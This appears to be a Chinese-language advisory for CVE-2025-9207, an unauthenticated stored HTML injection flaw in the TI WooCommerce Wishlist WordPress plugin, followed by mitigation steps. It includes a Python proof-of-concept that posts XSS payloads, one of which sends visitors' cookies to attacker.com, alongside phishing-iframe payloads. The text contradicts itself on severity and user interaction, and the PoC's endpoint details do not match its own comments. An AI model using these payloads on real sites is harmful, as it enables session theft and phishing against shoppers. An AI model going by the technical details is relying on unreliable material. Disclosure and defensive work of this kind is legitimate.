CVE-2025-9207 TI WooCommerce Wishlist插件HTML注入漏洞

漏洞信息

漏洞编号

CVE-2025-9207

漏洞类型

HTML注入

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

TI WooCommerce Wishlist WordPress插件

漏洞概述

CVE-2025-9207是WordPress平台下TI WooCommerce Wishlist插件中的一个高危HTML注入漏洞。该插件是一款广受欢迎的WooCommerce扩展程序，为电商网站提供心愿单功能，允许用户保存和管理感兴趣的商品。据Wordfence安全团队发现，该漏洞存在于所有版本直至2.10.0版本中。漏洞的根本原因在于插件接受隐藏字段输入且未对用户提交的数据进行充分的输入验证和输出过滤。攻击者无需任何认证权限即可利用此漏洞，通过在心愿单相关功能中注入任意HTML代码。当其他用户访问包含恶意内容的心愿单页面时，注入的HTML代码将在受害者浏览器中执行，可能导致跨站脚本攻击（XSS）、钓鱼欺骗、恶意重定向或会话劫持等安全问题。由于该插件在WooCommerce生态系统中拥有数十万活跃安装量，此漏洞对大量电商网站构成潜在威胁。

技术细节

该漏洞属于存储型HTML注入漏洞。攻击者利用插件在处理心愿单项目时的输入验证缺陷，通过构造特殊的HTTP请求向服务器提交包含恶意HTML代码的数据。根据Wordfence披露的技术细节，漏洞点位于wishlist.class.php文件的第326行和第544行附近，插件在此处直接处理用户输入的隐藏字段值而未进行适当的清理和转义。具体来说，攻击者可以在心愿单名称、描述或相关元数据字段中注入类似<script>alert('XSS')</script>或<img src=x onerror=恶意代码>的HTML标签。由于插件将这些数据存储在数据库中并在后续页面访问时直接输出，任何查看该心愿单的用户都会触发注入的代码。攻击者还可以注入钓鱼表单或恶意链接来窃取用户凭据。此漏洞的利用复杂度较低，无需认证且无需目标用户交互即可成功实施攻击。

攻击链分析

STEP 1

步骤1

攻击者识别目标WordPress网站并确认安装了TI WooCommerce Wishlist插件（版本≤2.10.0）

STEP 2

步骤2

攻击者构造包含恶意HTML/JavaScript代码的HTTP请求，针对心愿单功能端点发送

STEP 3

步骤3

插件接收请求后，由于缺少输入验证，直接将未经过滤的数据存储到数据库中

STEP 4

步骤4

当其他用户或管理员访问包含恶意内容的心愿单页面时，注入的HTML代码在受害者浏览器中执行

STEP 5

步骤5

攻击者利用成功注入的代码实施XSS攻击、会话劫持、钓鱼欺骗或恶意重定向等后续攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-9207 PoC - TI WooCommerce Wishlist HTML Injection
# Target: WordPress site with TI WooCommerce Wishlist plugin <= 2.10.0

target_url = "http://target-wordpress-site.com"

# PoC: Inject HTML/JavaScript via wishlist hidden field
# The plugin accepts hidden fields without proper sanitization

injection_payloads = [
    '<script>alert(document.cookie)</script>',
    '<img src=x onerror=fetch("https://attacker.com/log?c="+document.cookie)>',
    '<a href="https://malicious-site.com">Click here</a>',
    '<iframe src="https://phishing-site.com"></iframe>'
]

# Attack vector: Send crafted POST request to wishlist endpoint
# Endpoint typically: /?wc-ajax=add_to_wishlist

for payload in injection_payloads:
    exploit_data = {
        'wishlist_name': f'Test Wishlist {payload}',
        'wishlist_visibility': 'public',
        'product_id': '1',
        'quantity': '1'
    }
    
    response = requests.post(
        f"{target_url}/wp-admin/admin-ajax.php",
        data=exploit_data,
        headers={'Content-Type': 'application/x-www-form-urlencoded'}
    )
    
    print(f"Payload: {payload[:30]}... - Status: {response.status_code}")

print("\nNote: Injected HTML will execute when viewing the wishlist")

影响范围

TI WooCommerce Wishlist plugin ≤ 2.10.0

防御指南

临时缓解措施

如果无法立即升级插件，可临时采取以下缓解措施：1）禁用或限制未认证用户创建心愿单的功能；2）在Web服务器层面配置Content-Security-Policy响应头限制脚本执行；3）使用ModSecurity等WAF规则阻止包含可疑HTML标签的请求；4）考虑暂时替换为其他经过安全审计的心愿单插件。同时建议管理员审查现有心愿单数据，清理可能存在的恶意内容。